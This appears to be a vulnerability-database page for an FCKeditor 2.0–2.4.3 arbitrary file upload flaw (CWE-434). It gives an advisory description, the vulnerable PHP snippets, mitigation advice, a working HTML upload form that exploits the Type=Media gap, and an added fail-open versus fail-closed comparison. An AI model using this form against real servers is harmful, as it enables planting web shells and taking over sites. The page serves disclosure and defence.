Vendor: FCKeditor
By: grabz
CVSS: 7,5 HIGH
Arbitrary File Upload
CWE: 434
Product Name: FCKeditor
Affected Version From: 2.0
Affected Version To: 2.4.3
Patch Exists: YES
Related CWE: N/A
CPE: a:fckeditor:fckeditor
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: 2.0, 2.2, 2.3.2, 2.4.0, 2.4.3
2009

FCKeditor 2.0-2.4.3 arbitrary file upload

FCKeditor is a popular open source WYSIWYG HTML editor used by many websites. A vulnerability exists in versions 2.0-2.4.3 which allows an attacker to upload arbitrary files to the server. For versions 2.0-2.2, an attacker can send as the Type parameter any text other than File, Flash or Image and then upload a file with any extension. For versions 2.3.0-2.4.3, an attacker can send Type=Media and upload any file, because the config.php file defines no AllowedExtensions or DeniedExtensions entry for the Media type.

Mitigation:

Upgrade to the latest version of FCKeditor.

Exploit-DB raw data:

# Exploit Title: FCKeditor 2.0-2.4.3 arbitrary file upload
# Author: grabz
# Software Link: http://sourceforge.net/projects/fckeditor/
# Version: FCKeditor 2.x <= 2.4.3
# Tested on: 2.0, 2.2, 2.3.2, 2.4.0, 2.4.3

for version 2.0 - 2.2:
in file FCKeditor/editor/filemanager/upload/php/upload.php
#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
#
#// Get the allowed and denied extensions arrays.
#$arAllowed    = $Config['AllowedExtensions'][$sType] ;
#$arDenied    = $Config['DeniedExtensions'][$sType] ;
We can send as Type any text that is not one of (File, Flash, Image), and
then we can upload a file with any extension, such as ".php".

for version 2.3.0 - 2.4.3:
in file FCKeditor/editor/filemanager/upload/php/upload.php
#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
#
#// Check if it is an allowed type.
#if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
#    SendResults( 1, '', '', 'Invalid type specified' ) ;
#
#// Get the allowed and denied extensions arrays.
#$arAllowed    = $Config['AllowedExtensions'][$sType] ;
#$arDenied    = $Config['DeniedExtensions'][$sType] ;
In this code we can see a filter on Type, but in config.php
$Config['AllowedExtensions']['Media'] and
$Config['DeniedExtensions']['Media'] do not exist.
If we send Type=Media, we can upload any file.

#Exploit
<form enctype="multipart/form-data" action="http://localhost/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>
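
The fail-open pattern behind both version ranges, next to a fail-closed check, as an added example that is not FCKeditor's code or the advisory author's. The `$Config` key names come from the snippets above; the extension lists, the function names and the fail-open logic (an undefined or empty list means no restriction) are assumptions made for illustration.

```php
<?php
// Constructed config: key names follow the page, extension values are made up.
$Config = [
    'AllowedExtensions' => [
        'File'  => [],                    // denylist-only type
        'Image' => ['jpg', 'gif', 'png'], // note: there is no 'Media' entry
    ],
    'DeniedExtensions' => [
        'File'  => ['php', 'phtml', 'asp'],
        'Image' => [],
    ],
];

// Assumed fail-open check (not FCKeditor's code): an undefined or empty list
// means "no restriction", so an unconfigured type accepts any extension.
function isAllowedFailOpen(array $config, string $type, string $ext): bool
{
    $allowed = $config['AllowedExtensions'][$type] ?? [];
    $denied  = $config['DeniedExtensions'][$type] ?? [];
    if (count($allowed) > 0 && !in_array($ext, $allowed, true)) {
        return false;
    }
    return !in_array($ext, $denied, true);
}

// Fail-closed check: the type must have a non-empty allowlist containing $ext.
function isAllowedFailClosed(array $config, string $type, string $ext): bool
{
    $allowed = $config['AllowedExtensions'][$type] ?? null;
    if (!is_array($allowed) || $allowed === []) {
        return false;
    }
    return in_array($ext, $allowed, true);
}

// Lowercased last extension of the client-supplied file name.
function uploadExtension(string $name): string
{
    return strtolower(pathinfo($name, PATHINFO_EXTENSION));
}

// Constructed requests: [Type parameter, uploaded file name].
$cases = [['Image', 'photo.png'], ['Media', 'clip.php'], ['Other', 'x.php'], ['File', 'a.txt']];
foreach ($cases as [$type, $name]) {
    $ext = uploadExtension($name);
    $open = var_export(isAllowedFailOpen($Config, $type, $ext), true);
    $closed = var_export(isAllowedFailClosed($Config, $type, $ext), true);
    printf("%-6s %-10s fail-open=%-5s fail-closed=%s\n", $type, $name, $open, $closed);
}
```

The fail-closed version also rejects denylist-only types such as File in this sample config until an explicit allowlist is defined for them.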